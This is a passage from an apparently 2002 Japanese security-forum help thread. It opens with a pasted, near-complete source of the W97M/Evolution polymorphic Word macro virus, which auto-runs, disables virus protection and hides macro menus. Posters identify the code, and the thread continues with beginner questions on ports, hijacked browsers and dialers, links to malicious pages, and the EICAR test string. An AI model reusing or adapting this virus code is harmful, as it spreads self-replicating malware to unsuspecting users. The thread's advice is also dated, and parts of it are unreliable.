If x = 7 Then a$ = "G"
If x = 8 Then a$ = "H"
If x = 9 Then a$ = "I"
If x = 10 Then a$ = "J"
If x = 11 Then a$ = "K"
If x = 12 Then a$ = "L"If x = 13 Then a$ = "M"If x = 14 Then a$ = "N"
If x = 15 Then a$ = "O"
If x = 16 Then a$ = "P"
If x = 17 Then a$ = "Q"
If x = 18 Then a$ = "R"
If x = 19 Then a$ = "S"
If x = 20 Then a$ = "T"
If x = 21 Then a$ = "U"
If x = 22 Then a$ = "V"
If x = 23 Then a$ = "W"
If x = 24 Then a$ = "X"
If x = 25 Then a$ = "Y"
If x = 26 Then a$ = "Z"
VrusName = VrusName + a$
Next evo
Open "C:\windows\system\vnames.cpl" For Input As #1
Do
Line Input #1, Virname
Application.OrganizerRename Source:=ActiveDocument.FullName, Name:=Virname,
newname:=VrusName, Object:=wdOrganizerObjectProjectItems
' RAPE v1.1 Macro Virus Name Randomizer - 2 to 8 letters
Loop Until EOF(1)
Close #1
For x = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(x).Name = "ThisDocument" Then GoTo nex
If ActiveDocument.VBProject.VBComponents(x).Name <> "ThisDocument" Then GoTo rite
rite:
Open "C:\windows\system\vnames.cpl" For Append As #1
Print #1, ActiveDocument.VBProject.VBComponents(x).Name
Close #1
nex:
Next x
End
92 :02/02/23 02:39
Function
Function Evolution()
On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled
Call Self_RecognitionCall Armor_Status
Call Export_CodeCall Polymorphic_Check
Call Evolve
If Hostinf = False Then Call Norminf
If FileInf = False Then Call FileInft
Options.VirusProtection = False
Options.ConfirmConversions = FalseOptions.SaveNormalPrompt = False
If Armor = False Then CommandBars("tools").Controls("Macro").Delete
If Armor = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
' W97M/Evolution
' W97M/Evolution .a Variant by Nex and Error
' Polymorphic Stealth Word97 Macro Virus
' All Things Must Change...
' Polymorphic thanx to Random Arithmetic Polymorphic Engine (RAPE v1.1) by Error
' RAPE v1.1 does:' Randomly Morphs Source Code by Adding Random Remarks
' Randomly Selects Source Code Export File - Then Morphs it
' Randomly Creates Virus Macro Name' Randomly Adds 1 to 6 Commands to Code
End Function
Sub AutoClose()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Call Evolution
WordBasic.filesave
End Sub
Sub AutoExec()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled
Call Armor_StatusOptions.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If Armor = False Then CommandBars("tools").Controls("Macro").Delete
If Armor = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
End Sub
Sub AutoExit()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Call Evolution
PMExport = Dir("C:\Windows\System\PMF1199.cpl")
If PMExport = "PMF1199.cpl" Then PMFile_Yes = True
If PMFile_Yes = True Then Exit Sub
Open "C:\Windows\System\PMF1199.cpl" For Append As #1
Print #1, "W97M/Evolution .a by Nex"
Print #1, "Random Arithmetic Polymorphic Engine (RAPE v1.1) by Error"
Close #1
Open "C:\windows\system\Export.sys" For Input As #2
Line Input #2, FileID
Close #2
Open FileID For Append As #9
Print #9, "' EOF"
Close #9
Open FileID For Input As #3
Randomize Timer
W = Int(Rnd(1) * 5) + 1
For vir
93 :02/02/23 02:44
= 1 To W
x = Int(Rnd(1) * 26)
If x = 1 Then a$ = "A"If x = 2 Then a$ = "B"
If x = 3 Then a$ = "C"If x = 4 Then a$ = "D"
If x = 5 Then a$ = "E"If x = 6 Then a$ = "F"
If x = 7 Then a$ = "G"If x = 8 Then a$ = "H"
If x = 9 Then a$ = "I"If x = 10 Then a$ = "J"
If x = 11 Then a$ = "K"
If x = 12 Then a$ = "L"If x = 13 Then a$ = "M"
If x = 14 Then a$ = "N"If x = 15 Then a$ = "O"If x = 16 Then a$ = "P"
If x = 17 Then a$ = "Q"If x = 18 Then a$ = "R"
If x = 19 Then a$ = "S"If x = 20 Then a$ = "T"
If x = 21 Then a$ = "U"
If x = 22 Then a$ = "V"
If x = 23 Then a$ = "W"
If x = 24 Then a$ = "X"
If x = 25 Then a$ = "Y"
If x = 26 Then a$ = "Z"
Filename = Filename + a$Next vir
F = Int(Rnd(1) * 999) + 1FileID2 = "C:\windows\system\" & Filename & F & ".cpl"
Open FileID2 For Append As #4Do
inpux:Line Input #3, stuffPrint #4, stuff
Randomize Timer t = Int(Rnd(1) * 5) + 1 If t = 1 Then Z$ = " '" & Application.UserName
If t = 2 Then Z$ = " '" & Application.UserInitials
If t = 3 Then Z$ = " '" & Application.UserAddress
if t >= 4 then goto inpux
Print #4, Z$
' Source Code Morpher - adds random remarks to Code (RAPE v1.1 by Error)
Loop Until stuff = "' EOF"
Close #3
Close #4Kill "C:\windows\system\export.sys"
Open "C:\windows\system\Export.sys" For Append As #5
Print #5, FileID2Close #5
End SubSub AutoNew()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled
Call Evolution
End Sub
Sub AutoOpen()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Call Evolution
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
End SubSub ToolsCustomize()Application.EnableCancelKey = wdCancelDisabled
End SubSub ToolsMacro()Application.EnableCancelKey = wdCancelDisabled
End SubSub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabledEnd Sub
' "The most polymorphic Macro Virus to date...." - NAI
' EOF
↑これなに?
95名無しさん@お腹いっぱい。:02/02/23 12:15
ADSLモデムでネットに繋いでるんですが、
この場合、ISPはこのモデムにIPを割り当ててるわけで、
この状態でポートスキャンしてTCP80が開いてる等と結果が出ても、
それはこのモデムのポートが開いてるということだと
理解していいんでしょうか?

そしてこれはモデムには外部から進入されても、
PCはFWで守られてると言うことで、
安心してほっといてもいいんでしょうか?
モデムの設定を色々いじってみてるんですが、
80が開いてるのは変わりません。

W98SE+TPF、ISPはACCAです。
>>94
Bloodhound.HybridCOM
94、保存してスキャンせよ!
http://pc.2ch.net/test/read.cgi/sec/1014116411/85-93
>>96
脳豚では、何の反応もなかった・・・(;´Д`)
>>97
実行しないように注意してスキャン。
脳豚ではBloodhound.HybridCOMとなる。
99名無しさん@お腹いっぱい。:02/02/23 14:40
100名無しさん@お腹いっぱい。:02/02/24 00:41
どっちがプリップでどっちがフラップですか?
101名無しさん@お腹いっぱい。:02/02/24 00:46
某掲示板に書いてあった
ttp://go5.163.com/sg9741/
にアクセスしたらいきなり変な中国語のサイトにつながって、
その後ホームが勝手にそのサイトに変更されていた(これは戻しました)り、
PCの電源入れただけで勝手にエクスプローラーが開いてこのサイトに
接続しようとするんですが、どうやってこれを解除したらいいのでしょうか?
102名無しさん@お腹いっぱい。:02/02/24 00:50
ルーターのファイアーウォールで閉じるべきポートを教えてくれないでしょうか?
103ひみつの検疫さん:2024/04/25(木) 19:28:22 ID:MarkedRes
汚染を除去しました。
104101:02/02/24 02:19
これって結局なんなんですか?できれば解決法教えてください。
105名無しさん@お腹いっぱい。:02/02/24 02:32
137.138.139.445.
106対処法:02/02/24 02:38
107名無しさん@お腹いっぱい。:02/02/24 03:10
使用しているTCPポート、UDPポートって
どうやって確認するんですか?
109101:02/02/24 03:41
ありがとうございます。じっくり検索してみます。
110名無しさん@お腹いっぱい。:02/02/24 05:49
http://www.geocities.com./oohozv/image/list01.jpg
これをくらってしまいました。
Windows、system、system32フォルダの中身がほとんど消えました。
もう私は救われないのでしょうか。
死んでいいですか。
111名無しさん@お腹いっぱい。:02/02/24 09:51
食らったのは可愛そうだけど、
それをリンクに貼らなくてもいいのでわ?
h取るとか・・・
112110番:02/02/24 10:00
>>111
そだったな。
つか、リンク先開くだけじゃ害はないから。
113助けてください:02/02/24 10:19
超初心者です、申し訳ありませんが助けていただけませんでしょうか!
ttp://www.top.or.jp/~godhand/a2.html

こんなものを踏んじゃったんですけど、これって悪い物なのでしょうか?
御存知の方教えてください。よろしくおねがいします。



114名無しさん@お腹いっぱい。:02/02/24 10:44
NortonのLiveUpdateですが、現在2002をデスクトップとノートに
インストールして使ってます。各々LiveUpdateして使ってますが、
それで支障がないか心配です。つまり、例えばUpdateFile「1」があったとして、
デスクトップにインストールすると、次回の更新チェックをノートですると
「1」はインストール済みとしてスキップされてしまうのでしょうか?
ソフトウェアは1ユーザーにつきデスクトップとノートにインストールできる
と思っていたんですが、それでいいのでしょうか?
>>114
Nortonは、1パッケージにつき1コンピュータのみにインストールするという
許諾のため、そのような使い方はライセンス違反です。
インストール時にそのようなライセンス表示があったはずです。
同じ更新を2回ずつ行っていると、Symantec にはそのことが筒抜けですよ。
至急、ノート用にもうひとつパッケージを購入されたほうがいいでしょう。
116名無しさん@お腹いっぱい。:02/02/24 11:10
ダイアルアップが出来なくなってしまいました
昨日まで問題なく、今日電源入れて接続しようとしたところ
「電話帳のエントリに接続できません エラー756:この接続はすでにダイヤルされています」
他にモデムはなく、接続しているわけではありません。
一旦、ダイヤルアップ接続アイコン削除し新規作成しましたが状況は同じです。

助けてください!!
>>116
それのどこがセキュリティなんだ?
Win板で聞いた方がいいな。
118116:02/02/24 11:23
>>117
説明不足で申し訳ないです
実は、進入された疑いがあるんです。
昨日、終了する直前気が付いたのですが、
BIDが赤く点滅しており
「トロイの木馬プログラムから侵入者に対してデータが送信されています」
という具合になっていたのです。
直ちに回線切断しウイルスチェックしましたが何もありませんでした。
で、今日接続できなくなっていたわけです・・・

再インストールでしょうか?
>>118
MS-DOSからnetstat -an > test.logしてここにはっつけてみ。
>>110
これjpegに偽装した怪しい奴でしょ。
自己責任つーことで逝って良しですな。
121116:02/02/24 11:59
>>119
w2kなので・・・
122119:02/02/24 12:04
アクセサリにコマンドプロンプトって無いか?
まず見るべきはnetstat -an, netstat -rn, ipconfig /allだな。
>>110
右クリックして「対象をファイルに保存」とすると、*.html になるので、
確かに html ですね。
>>124
んなことねーぞ。
126116:02/02/24 12:56
こんなん出ました!
インターネット接続共有のホストPCです

C:\>netstat -an

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1027 0.0.0.0:0 LISTENING
TCP 127.0.0.1:3007 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3002 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3003 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3004 0.0.0.0:0 LISTENING
TCP 192.168.0.1:11989 0.0.0.0:0 LISTENING
UDP 0.0.0.0:135 *:*
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:1645 *:*
UDP 0.0.0.0:1646 *:*
UDP 0.0.0.0:1812 *:*
UDP 0.0.0.0:1813 *:*
UDP 0.0.0.0:3001 *:*
UDP 127.0.0.1:3005 *:*
UDP 127.0.0.1:3006 *:*
UDP 192.168.0.1:53 *:*
UDP 192.168.0.1:67 *:*
UDP 192.168.0.1:68 *:*
UDP 192.168.0.1:500 *:*
UDP 192.168.0.1:12886 *:*

127116:02/02/24 12:59
一応、MACは***にしておきました

C:\>netstat -rn

Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...** ** ** ** ** ** ...... I-O DATA ET100-PCI Series
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.0.0 255.255.255.0 192.168.0.1 192.168.0.1 1
192.168.0.1 255.255.255.255 127.0.0.1 127.0.0.1 1
192.168.0.255 255.255.255.255 192.168.0.1 192.168.0.1 1
224.0.0.0 224.0.0.0 192.168.0.1 192.168.0.1 1
255.255.255.255 255.255.255.255 192.168.0.1 192.168.0.1 1
===========================================================================
Persistent Routes:
None
128116:02/02/24 13:00
一応、HOSTNAMEも****にしておきました

C:\>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : *******
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter ローカル エリア接続:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : I-O DATA ET100-PCI-R Fast Ethernet A
dapter
Physical Address. . . . . . . . . : **-**-**-**-**-**
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
NetBIOS over Tcpip. . . . . . . . : Disabled
129116:02/02/24 13:16
不思議なことに、接続できるようになりました
しかし、インターネット接続共有に関するNISの設定が変になったようで
共有できません。
NISを無効にすると共有接続できます。
やはり 再インストールなんでしょうか?
130 :02/02/24 15:53
3月からグローバルIPアドレスがもらえるようになるケーブラーなんですが
グローバルIPアドレスでどういうことが出来るのでしょうか?
ちなみに、サーバの設置はプロバイダに禁止されています
なぜセキュリティ板かというのは、グローバルIPにした場合の危険などがあるようでしたら教えてもらいたかったからです
簡単な説明や使用法、危険を教えてもらえませんか?
131 :02/02/24 16:00
132名無しさん@お腹いっぱい。:02/02/24 16:33
>>131
130じゃないけど、勉強になりました。ありがとうございます。

その記事を読むと、ADSLモデムは危険らしいんですが、
僕のADSLモデムは、設定画面を見ると、ルータモードというので接続してます。
これは、
「ブロードバンドルーターを使用した接続」
(=家庭内ネットワーク上のコンピュータはプライベートIPアドレスを利用するため,ルータが簡易ファイアウォールとなり,インターネット側からの攻撃を回避することができる。)
と同じ状態だと考えて、安心して良いのでしょうか?
基本的には合ってるけど、
ルーターでFW築こうなんて考えちゃいかんよ
思考が全く逆なだけで串厨と同じ
>>133
そうですか。
自分のADSLモデムがルーターになってるって事もよくわからなかったので、
少し安心したんですが。
一応PFWソフト使ってるんですが、知識も設備を整えるお金もないし、
現時点ではこれで精一杯です。

もし良ろしければ、なぜ
 > ルーターでFW築こうなんて考えちゃいかんよ
 > 思考が全く逆なだけで串厨と同じ
なのか、教えていただけると嬉しいです。
「いかん」けど、安全であることに変わりがないのなら、
今の状態で自分を安心させたいのですが。

何かつたない文章ですいません…。
ルータ(NAT/NAPT&PF)もプロクシも繋ぐためのもの
それをセキュリティ確保やそのアンチテーゼとして用いるのはどうかな
ってところ
繋ぐことが念頭にあるのであって、
本質的にはセキュアでもなんでもない

実際にはルータにセキュアが付いて回るけどわけだけど
グソコのオマケ程度と思えばいいんじゃないかと
販売元が「簡易」FWと言ってるんだし
>>135
なるほど。ありがとうございました。
本質を考えるとってことですね。勉強します。
137(;´Д`):02/02/24 18:49
http://www.top.or.jp/~godhand/a2.html
↑のリンクを踏んでしまったのですがこれは何のページなんでしょうか?
PCに悪影響は及ぶのでしょうか?
もしそうだったら対策などを教えてください。
お願いします、、、
>>137
危なそうだと分かってるURLを直リンするお前は?
>>137 この板の初心者質問スレッドを最初から読め。
140ヴァカ:02/02/24 19:10
140げっと
141名無しさん@お腹いっぱい。:02/02/24 22:01
ウィルスバスター2002をいれていますが、
エロサイトにいってから常に不正アクセスをうけています。
画面右下に出ているマークがずーとベルマークになっているんです。
気持ち悪いんでどうすれば良いでしょうか?
当方初心者なものでお願いします。
142cheshire-cat:02/02/24 22:21
>>141
接続一旦切って再接続。
これでIPアドレスが変わると思うけど。
プロバから固定IPアドレスを割り当てられているんじゃなければ。
143名無しさん@お腹いっぱい。:02/02/25 13:12
ICQにしょっちゅう↓アドレスが来るので
逝ってみたら、Cの中身が見れてしまいました。
これはどうしたらいいですか?

ttp://www.security6.ch.vu
どうしたらいいですか?
ネットで晒していいか聞いてから晒せやこの単細胞!
このサイトの人に聞くんですか?
英語が堪能ではないので啓発してるのか、何かの宣伝なのか、
教えてほしいのですが。
このサイトを見てどうしたらいいのかもわかりませんし。
なんか怖い。

また来ました。
146>>143:02/02/25 14:24
ソフトの宣伝です。
アナタのHDDの中身を表示しているだけなので、
相手からは何も見えていません。
放置が原則。それより、むやみにリンクをクリックするな。
<iframe src="file:///C|/">か…。
下らない仕掛けだなー。
これで不安感煽って宣伝してるなんていかがわしすぎる。
>>146>>147
どうもありがとうございます。
今後気を付けます。
149みゅ〜:02/02/25 17:40
basic認証のかけ方が分かりません。鯖はおもしろ.com使ってます。
.htaccessファイルは
AuthUserFile /public_html/.htpasswd←フルパスを書くんだけどフルパスがわからない。
AuthGroupFile /dev/null
AuthName ByPassword
AuthType Basic
<limit get>
require valid-user
</limit>
こうなってます。.htpasswdファイルには暗号した内容が入っています。
アップしてみるとInternal Sever エラーが出るだけで、
basic認証の画面がでません。
どうすれば、出るのでしょうか?
↑マルチ
151 :02/02/25 17:43
>>150
わざわざ見つけ出すお前は暇人
↑マルチーズ
153暇人:02/02/25 18:46
>>151
お忙しい中、わざわざ指摘してくれてありがとう。
「わざわざ」なわけないでしょ。「たまたま」見つけたんだよ。
154名無しさん@お腹いっぱい。:02/02/25 21:43
VPNネタはどこにあるか教えてください
155名無しさん@お腹いっぱい。:02/02/25 22:19
あれれ

VPN関係のスレはどこが適当でしょうか
すいません。教えてください
156ひよこ:02/02/25 22:24
なんでjpgなどというありふれた画像ファイルと同じ拡張子の
ウィルスが存在し、gifやmp3やmpgには存在しないんでしょうか。
それともこれから登場する可能性はあるんでしょうか。
157cheshire-cat:02/02/25 22:28
>>156
jpgは単なるデータファイル。
もしコードを挿入しても、ダブルクリック後にウイルスの感染活動は起こらない。

現状ではね。
158 :02/02/25 22:31
>>154-155
VPNは今のところ関わっている人が少ないせいか、
質問とか出てもなかなか話が進まないんだよねえ。
VPN関係のスレが比較的あるのは通信技術板のようなんで、
ちょっと除いてスレタイトル検索でもしてみれば?
159ひよこ:02/02/25 22:44
>157
>ダブルクリック後にウイルスの感染活動は起こらない。

そうなんですか・・・?よくxxx.jpgってリンクが2chに
貼りつけられててブラクラだウィルスだと騒いでますが、
(もちろん私は絶対踏みませんけど)あれを踏むと
感染するんじゃないんですか?
さっきなにげなくここを踏んでしまったのですが
大丈夫なのでしょうか???
ココ→http://ime.nu/ime.nu/www.bd.wakwak.com/~shino/data/download.html

これ置いてあった所は
滅多にブラクラとか貼られない板だっただけにショックです。。。(T_T)
161名無し:02/02/25 23:01
知人がBOBONetに引っかかって4万請求されたそうです。
お金の事は相談所とその知人任せでしょうが

とりあえず接続の設定だけは直したようなんです。
BOBONetの接続設定を消す→普通に使っていた電話番号を設定し直す→
インターネットオプションで電話番号を確認。電話番号は大丈夫。

やった事はこれです。
ウワサによるとBOBONetの接続プログラムは再起動しても
また国際電話回線に接続されると聞いたんですが、これで大丈夫なんでしょうか?
162cheshire-cat:02/02/25 23:08
>>159
本当のリンク先がjpgファイルそのものじゃなくて、htmlだから。
>>160
それ、でもブラクラでもないよ。
ただのGIFファイルだし。
164ひよこ:02/02/25 23:21
>162
そういうことなんですか・・・ありがとうございました。
165>162:02/02/25 23:25
実体はこれ↓
ttp://www.bd.wakwak.com/~shino/data/end.gif
あなたが見たのと同じのが出てくるはず。
 
167cheshire-cat:02/02/25 23:49
同じ内容の話題が同時進行していたのに、今になって気付いた。鬱。
168厨房女:02/02/25 23:49
すみませんどうしても分からないのでお願いします。

WinXPマシン2台でLANを構築しHTTPDをインストしてWeb鯖を立てました。
こんな感じです。

XPメイン---LAN----XP鯖、TA-----ISDN---------

で、サーバーでhttp://127.0.0.1を指定したり、メインマシンからhttp://ローカルアドレス
でみるとHPが表示されるのですが、複数の友人宅からはhttp://IPで全く見えません
何故でしょうか?ひょっとして外部からの80ポートにアクセスするとサーバーではなく
メインの方にアクセスしてしまうんでしょうか?
どのように設定すれば正常に見れますでしょうか?
よろしくお願いします
169cheshire-cat:02/02/26 00:00
>>168
ひょっとして友人達って、TAのport80にアクセスしてる?
170名無しさん@お腹いっぱい。:02/02/26 00:10
RADIO LIFEにウラワザ書いてた。
>>168
ここはセキュリティ板なんだが、なぜここで聞く?
172 :02/02/26 01:14
さっきからゾーンアラームが同じIPアドレスから30回くらい
反応するんですけど、これはなんですか?
なんですか?と言われても…こっちからは見えないよ!
174172:02/02/26 01:21
213.93.79.228 すいません。このIPです。
これでwho is で見ても全くわからないんですが・・
IPだけじゃ分からないよ!!つーかホットケ!
176名無しさん@お腹いっぱい。:02/02/26 01:37
自分のHDDが勝手に共有になってしまう。
起動するたびに共有設定にされてしまいます。
これはウイルスの仕業でしょうか?
>>176
もしかしてOSはWindows2000?
>>176
あなたの探しているものは金の斧ですか?銀の斧ですか?
それともこれですか?
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareWks"=dword:00000000
179名無しさん@お腹いっぱい。:02/02/26 01:40
いいえWIN98です。
フォルダ名の後ろに$マークまで付いてきます。

「C$」って・・・
$は共有してるときに\と区別するためについているんだが
どっちにしろファイルプリンタ共有をはずせば戻るだろ
181176:02/02/26 01:51
>180
直ったかも・・・

みなさんありがとうございました
182名無しさん@お腹いっぱい。:02/02/26 01:55
すみません、教えてください。
Tiny2.0.15なのですが、ネットに繋ぐときだけ起動しているのですが
そうすると、アドミニ以外では起動できないのですがどうすれば
良いですか?(ロードできないってエラーです)
OS:Win2K+SP2、設定で手動で起動するにしてます。
ちなみに、ZONEの時は起動はOK終了が×でした。
184名無しさん@お腹いっぱい。:02/02/26 03:59
ブラクラの様な物を踏んでしまって、
再起動したらウインドウズの設定を変えられてしまったようなんです。

症状は、まずIEのホームページ設定先を、
ブラクラに変えられてしまいました。
さらに、インターネットオプションで設定を戻そうとしたら、
”このコンピュータの制限により処理は取り消されました”
と表示されてしまい、設定を変えさせてもらえません。
他にも、知らないところをいじられているかもしれません。

だれか対処法を知っている方、いましたら助けてくれませんか?

windows板にこの質問を書いたところ、
セキュリティー板に同じ様な質問があると聞いてここに来ましたが、
どれがどれだかさっぱり解りません。
何処に対処法があるか教えてもらえませんか?
185184:02/02/26 04:10
www.geocities.com/ccsacla/jpeg/index.html(ブラクラです)
ここが変えられてしまったIEのホームページ設定先です。
>>184-185
ここの昨日今日あたりをミロ
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
187名無しさん@お腹いっぱい。:02/02/26 04:33
フリーのANTIDOTEを入れようと思うのですが
・SuperLite - 簡易版
・Personal Edition - パーソナル版
のどちらなんでしょうか?お願いします
http://www.vintage-solutions.com/indexjpn.html
188 :02/02/26 06:27
CD-ROMが不定期に突然動き出すんですが考えられる原因は何でしょうか?
ノートンでウイルスチェックしても何も検出されないんですが。
>>187
とりあえず↓のページの全部のリンクを辿れ。
http://www.vintage-solutions.com/Japanese/Antivirus/index.html
190 :02/02/26 09:14
>>188
スタートアップ、タスクスケジューラ、常駐モノのチェック。


アンチウイルスソフトでFDがガタガタいうてのはよくある話だけど
まさか、CDドライブをチェック対象にしたりとかは??
191190:02/02/26 09:14
>>188
関係ないかもしれないけど、最近使ったファイルの削除も。
192シロウト:02/02/26 09:43
アングラ系のHPをウロウロしたいのですが、串を当てるようにと注意されました。
ネット接続はル〜タを使用しており、接続方法はダイヤルアップ(ISDN)です。
ル〜タからのネット接続ですから、IEのダイヤルアップの設定の所で、
串を当てても意味ないですよね?
そこで、LANの設定という所で同じ事を(串の当て方を見て)すると、
HPの表示すらされなくなります。
ル〜タを使用している場合は串が当てられないのでしょうか?
IPとプロバイダ等 しっかり見られてしまうのが嫌です。
また、都合上、MSN用のポ〜トとMX用のポ〜トを閉じてしまう事までは出来ません。
それ以外のポ〜トはガ〜ド出来ていると思いますが・・。
串以外にも、気をつけるべきセキュリティの知識等も教えてください。
お願いします。
193名無しさん@お腹いっぱい。:02/02/26 13:52
ZONEは4姉妹なのですか?
194>>193:02/02/26 13:55
いいえ。ポッキーです。
195名無し~3.EXE:02/02/26 14:24
>192
初心者だったら悪いことはしない。これが一番確実。
いくらログを取られても、何もしなければ何も起こらない。
196名無しさん@お腹いっぱい。:02/02/26 15:10
数日前から、ネットをしているときにおかしいことに気がつきました。
まずアスキーアートの表示のされ方が少し変になりました。
モナーの口とかその他たくさんの文字が黒い長方形で表示されるようになりました。
そしてウィンドウの右上にある最大化・最小化・閉じるのボタンの中の絵が
何だかおかしな表示になってます。
最小化のボタンの絵にに0、最大化に1という数字が現れるようになりました。
この原因は何なのでしょうか?
どうか教えてください。
>>196
FAQだよ。>>1-50を良く読め。
198名無しさん@お腹いっぱい。:02/02/26 15:52
cookieの値からパスワードを割り出すにはどうすれば良いですか?
199196:02/02/26 16:07
>>197
ごめんなさい。
ネット初心者なものでよく分かりません。
FAQとはなんですか?
>>199
初心者だからって何でも許されるわけではありませんよ。気をつけて。
http://homepage2.nifty.com/winfaq/fontstrouble.html
>>199
わからないことは人の手をわずらわせる前に自分で調べてみましょう。
2chは初心者に仕えるパシリですか。
>>198
マルチ(複数の板やスレに質問を書き込むこと)も嫌われる。
答えられるスキルのある奴はたいていあちこちの板やスレを
見て回っているので、マルチを見るとむかついて
答える気をなくす。
Symantec Security Check
http://www.symantec.com/region/jp/securitycheck/index.html
で アクティブなトロイの木馬スキャン 「要注意」 で
ポート5000がオープンだったんですが、簡単に塞ぐ方法ってありますか?
WinMeでWindowsUpdateはしています。
他のPCではファイヤーウォール無しで 「安全」 だったのに。
フィルタリングルール作る
ほかのPCで安全なら比較すりゃ分かること

>>202
初心者だから初心者板やPC初心者板を
知らんのだと思われ
>>204
ユニバーサルPnP=テーマパーク
207196:02/02/26 21:44
>>200-202
本当にすいませんでした。
ごめんなさい。
おかげで治りました。
208 :02/02/26 23:52
  
>>204
ツールを使え。

https://grc.com/unpnp/unpnp.htm
210名無しさん@お腹いっぱい。:02/02/27 00:20
GoogleやYahooでもヒットしませんでした。
システムフォルダのこれは何なのでしょう?
(TExUtil.Exeだったら、アクロバットリーダー関係っぽいのですが。)

TExBUtil.Exe
211名無しさん@お腹いっぱい。:02/02/27 00:25
別のスレにも書いたんですけどレスがつかなくて、
気になって仕方ないのでこちらにも失礼します。

この板の「このウィルス何?」スレに入ろうとしたら
ウィルスが検出されました、というウィンドウが出たので慌てて閉じました。
もしかしてあのスレはウィルスに汚染されているのですか?
ほっといたら大勢感染してしまうのでしょうか?
もしかして凄く危ないのでは?
(PCにうといのでたいした事じゃなかったらすみません)
>>210 俺んとこには無い。 プロパティでバージョン情報見れ
>>211
初心者スレ嫁
>>211
んなもんいちいち気にするな。
特定の文字列があってそれにワクチンソフトが反応しているだけだ。

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

↑これでも反応するはず。
215別スレの455:02/02/27 01:04
211です。
別スレでもレスもらいました。ホッと一安心(照レ)
どうもありがとうございました。
216名無しさん@お腹いっぱい。:02/02/27 01:15
IEのアップデートしたんで最近出たページを開くと感染するウイルスのURLキボンヌ
217名無しさん:02/02/27 01:20
最新のワクチンファイルをDLした場合、
それは以前のファイルに上書きされるんでしょうか?
それとも別のものとして書き込まれるのですか?
218 :02/02/27 01:50
よそのサイトに飛ぼうとするとURLの頭にhttp://ime.neって出るようになっちゃたんですが
何ですかこれは
>>216
jpgでその辺の質問スレを検索

>>217
そのスレでやれ

>>218
ime.neかime.nuでその辺の質問スレを検索か
初心者板にある
220名無しさん:02/02/27 03:11
>>219
そのスレとは、どのスレですか?
>>220
てめーが使ってるアンチウィルスソフトについてのスレッドに決まっちゃいませんでしょうか?
>>220
どのスレ?アフォですか?
ワクチンファイルは上書きされるんですか?
http://pc.2ch.net/test/read.cgi/sec/1014409998/
223エロ厨:02/02/27 05:54
ここで拾ってしまったんですが、
突然女の顔が画面いっぱいに広がって、
「キャーーーー!」って一瞬叫んで何事も
無かったように消えて・・・の繰り返しの
ウィルス?をもらっちゃったんですが、
どうやって削除すればいいんでしょうか?
224188 :02/02/27 09:16
>>190 どうもです。
ノートン2002のAuto-Protectを常駐してるんですがこれが原因ですかね?
(本家で聞いた方がいいかな)
226エロ厨:02/02/27 14:15
>>225

ありがとう。
>>224 Auto-Protect切るとNAV入れてる意味がほとんどなくなる。
228 :02/02/27 19:47
http://www.fukumi.co.jp/tips/net_access.htm

ここってセキュリティアカデメイアの無断転載でしょうか?
229たすけて〜:02/02/27 20:06
さっきから一分おきくらいに誰かはいってこようとしてブロックしましたって
でるんですけどどうしたらいいの?退治できないですか?
>229
マルチすんな
231名無しさん@お腹いっぱい。:02/02/27 20:16
232名無しさん@お腹いっぱい。:02/02/27 21:22
>>232
禿既出
気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/
JOKE_MADO.A
235232:02/02/27 21:29
ありがとうございます
236名無しさん:02/02/27 23:42
 Win2000のマシンで起動直後に「ワトソン博士がオープンできません」
という変なエラーメッセージが出ます。これはウィルスなんでしょうか?
 ウィルスバスターで検索しても引っかかりません。
237cheshire-cat:02/02/27 23:58
>>236
ワトソン博士、ウイルスじゃないんだけど。
スタートアップかサービスに登録されてしまったんだろうから、はずせばいいのに。
ワトソン博士とピーター・ノートンは同一人物
239名無しさん@お腹いっぱい。:02/02/28 16:02
なぜか韓国語のHPになってしまうのです
これってウイルスでしょうか?
>>239
はい。
241204:02/02/28 16:28
>>209
無事解決しました。ありがとう。
242名無しさん@お腹いっぱい。:02/02/28 17:08
WinMXで出まわっている「メールアドレスから本名割り出しアプリ」って信用できるんですか?
作者の身元も不明だし・・・・。
243239:02/02/28 17:18
出来れば解決方法知りたいのですが・・・>>240
よろしゅうおねがいしまーーーす。
>>242
本名割り出せるわけないでしょ。何考えてんの?
245名無しさん@お腹いっぱい。:02/02/28 17:30
